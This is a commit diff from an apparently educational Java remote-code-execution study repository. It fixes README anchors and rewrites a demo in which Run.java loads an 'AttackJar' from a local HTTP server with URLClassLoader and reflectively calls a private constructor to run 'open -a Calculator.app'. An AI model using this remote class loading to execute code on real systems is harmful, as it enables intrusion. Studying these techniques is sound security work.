sync :)

Author: Whoopsunix

README.md

@@ -6,39 +6,39 @@ By. Whoopsunix
 
 🚀 记录贴 对照实战场景梳理较通用的 Java Rce 相关漏洞的利用方式或知识点
 
-🚩 对于实际环境遇到过的组件如有必要会针对可利用版本进行一个梳理 慢更
+🚩 对于实际环境遇到过的组件如有必要会针对可利用版本进行一个梳理 慢更 
 
 🚧 长期项目 不定期学习后更新......
 
 部分 RceDemo 已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
 
 ## 目录
 
-- [0x01 RceEcho](#0x05-rceecho)
+- [0x01 RceEcho](#0x01-rceecho)
     - [Tomcat](#tomcatecho)
     - [Spring](#springecho)
     - [Jetty](#jettyecho)
     - [Undertow](#undertowecho)
     - [Resin](#resinecho)
     - [OS](#osecho)
-- [0x02 MemShell](#0x06-memshell)
+- [0x02 MemShell](#0x02-memshell)
     - [TomcatMemShell](#tomcatmemshell)
-- [0x03 命令执行](#0x01-command)
+- [0x03 命令执行](#0x03-command)
   - [执行Demo，java jsp](#执行demo)
   - [执行结果输出（InputStream 处理Demo）](#执行结果输出inputstream-处理demo)
-- [0x04 表达式注入](#0x02-expression-inject)
+- [0x04 表达式注入](#0x04-expression-inject)
   - [OGNL](#ognl)
   - [EL](#el)
   - [SPEL](#spel)
-- [0x05 JDBC Attack](#0x03-jdbc-attack)
+- [0x05 JDBC Attack](#0x05-jdbc-attack)
   - [Mysql](#mysql)
   - [PostgreSQL](#postgresql)
   - [H2database](#h2database)
   - [IBM DB2](#ibmdb2)
   - [ModeShape](#modeshape)
   - [Apache Derby](#apache-derby)
   - [Sqlite](#sqlite)
-- [0x06 Serialization](#0x04-serialization)
+- [0x06 Serialization](#0x06-serialization)
   - [BCEL](#bcel)
   - [远程Jar加载](#remotejar)
   - [XMLSerialization](#xmlserialization)

Serialization/AttackJar/src/main/java/org/example/Run.java

@@ -1,9 +1,5 @@
 package org.example;
 
-import java.lang.reflect.Constructor;
-import java.net.URL;
-import java.net.URLClassLoader;
-
 /**
  * @author Whoopsunix
  */
@@ -17,23 +13,24 @@ public static void main(String[] args) throws Exception {
 //        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
 //        Object object = loadedClass.newInstance();
 
-        URL url = new URL("http://127.0.0.1:1234/");
-        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
-        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
-        Object object = loadedClass.getConstructor(null).newInstance(null);
+//        java.net.URL url = new java.net.URL("http://127.0.0.1:1234/");
+//        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});
+//        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
+//        Object object = loadedClass.getConstructor(null).newInstance(null);
 
         /**
          * 调用构造方法
          */
-//        URL url = new URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
-//        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
-//        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
-//        // public
-////        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
-//        // private
-//        Constructor constructor = loadedClass.getDeclaredConstructor(String.class);
-//        constructor.setAccessible(true);
-//        Object object = constructor.newInstance("open -a Calculator.app");
+        java.net.URL url = new java.net.URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
+        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});
+        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
+        // public
+//        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
+        // private
+        Class cls = String.class;
+        java.lang.reflect.Constructor constructor = loadedClass.getDeclaredConstructor(cls);
+        constructor.setAccessible(true);
+        Object object = constructor.newInstance("open -a Calculator.app");
 
         /**
          * 调用方法